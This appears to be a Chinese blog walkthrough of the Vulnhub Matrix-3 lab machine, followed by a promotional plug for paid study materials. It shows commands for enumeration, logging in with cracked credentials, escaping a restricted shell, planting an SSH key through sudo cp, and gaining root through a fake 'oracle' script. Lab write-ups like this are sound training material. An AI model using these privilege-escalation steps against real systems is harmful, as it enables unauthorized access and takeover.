Vulnhub Walkthrough Matrix-3_matrix vulnhub walkthrough

让我们通过扫描网络,并确定主机的IP地址开始的。我们可以通过使用Netdiscover确定我们的主机IP为192.168.1.104。

扫描
然后,我们使用Nmap的端口枚举。我们发现80端口是开放的,SSH是在端口6464和端口7331上运行在目标机器上打开。
命令: nmap -p- -A 192.168.1.104
在这里插入图片描述

枚举:
正如我们可以看到80端口是开放的,我们试图在我们的浏览器中打开的IP地址,但我们没有发现任何网页上的有用。
在这里插入图片描述
因此使用dirb进行目录枚举。
命令: dirb http://192.168.1.104
用DIRB暴力破解后,我们发现了一个名为/assets 的目录
在这里插入图片描述

我们在浏览器下/assets/ img / URL打开了assets目录,发现一个名为Matrix_can-show-you-the-door.png的图像文件。
在这里插入图片描述

我们先打开这个图片,但没有找到我们所使用的任何东西。然后,在观看的文件名正确,我们发现该文件的名称本身给了我们前进的道路。
所以我们用Martix的URL如下面的图像中,它为我们工作。从目录矩阵的内容,我们知道我们必须使字母的正确组合,以继续进行。
在这里插入图片描述
因此,在尝试了多种组合之后,我们更积极地利用我们的小大脑,将n/e/o/6/4组合起来,neo是《黑客帝国》电影中演员的名字,64号是我猜这个虚拟机创造者最喜欢的号码,因为他到处都在使用它。
在这里插入图片描述
我们下载的文件secret.gz,发现它实际上是一个txt文件,并包含用户名和密码。
命令: file secret.gz/下载文件 cat secret.gz//查看文件内容
在这里插入图片描述
破解后使用在线工具hashkiller哈希密码,发现密码为passwd文件。

如果从记得NMAP扫描,我们有一个端口7331打开,它与基本身份验证保护。
因此,我们试图打开URL http://192.168.1.104:7331并提示进行身份验证,所以我们用管理员:passwd作为用户名和密码,并能成功登录。

但是,我们找不到任何有用的数据存在,所以我们用DIRB与已获得的目录暴力破解用户名和密码。
暴力破解之后,我们发现了一个名为数据目录。
命令 : dirb http://192.168.1.104:7331 / -u admin:passwd
在这里插入图片描述
在数据目录中,我们发现它出来是DOS文件的文件名的数据
开发:
我们把需要谷歌我们最好的朋友的帮助下知道如何打开一个DOS文件。而一些研究之后,我们发现了一个名为Ghidra打开一个DOS文件的工具。
用Ghidra工具打开数据文件后,我们发现一个用户名和密码 guest:7R1n17yN30
在这里插入图片描述
正如我们已经从我们的nmap扫描知道有SSH在目标计算机上的端口6464上运行,因此我们尝试用上面找到用户名和密码的ssh目标机就能成功的登录。
命令: ssh guest@192.168.1.104 –p6464
Id
但是我们获得了restricted bash(rbash)shell,所以我们使用–t选项运行带有noprofile扩展的ssh,得到了来宾用户的完整shell.
正在检查来宾用户的sudo权限我们发现此用户可以使用其他用户trinity的权限运行/bin/cp。
命令: ssh guest@192.168.1.104 –p6464 –t “bash --noprofile”
sudo -l
在这里插入图片描述
提升权限:
要提升到一个更加特权的用户,我们所做的是我们创建了一个新的SSH密钥对,给读写执行权限id_rsa.pub文件,这样我们就可以把它复制到我们的目标位置。
命令: ssh-keygen
cd .ssh
chmod 777 id_rsa.pub

在这里插入图片描述
然后,我们利用sudo权限复制/home/trinity/.ssh/authorized_keys文件夹中的id_rsa.pub文件。现在我们可以使用id_rsa密钥使用trinity user访问目标机器的ssh。
检查trinity的sudo权限它可以使用根权限执行oracle文件。
命令: cp id_rsa.pub /home/guest
cd …
sudo -u trinity /bin/cp ./id_rsa.pub /home/trinity/.ssh/authorized_keys
ssh trinity@127.0.0.1 -i /.ssh/id_rsa -p 6464
sudo -l
在这里插入图片描述
但是在/home/trinity目录中没有名为oracle的文件,因此我们使用echo命令创建了一个包含/bin/sh的oracle文件。最后,我们用sudo命令执行oracle文件,得到了root shell。
一旦你有了root shell,你就可以很容易地得到flag。
命令 : echo “/bin/sh” > oracle
chmod 777 oracle
sudo ./oracle
id
ls
cat flag.txt

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

bs.csdn.net/topics/618653875)

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

  • 13
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值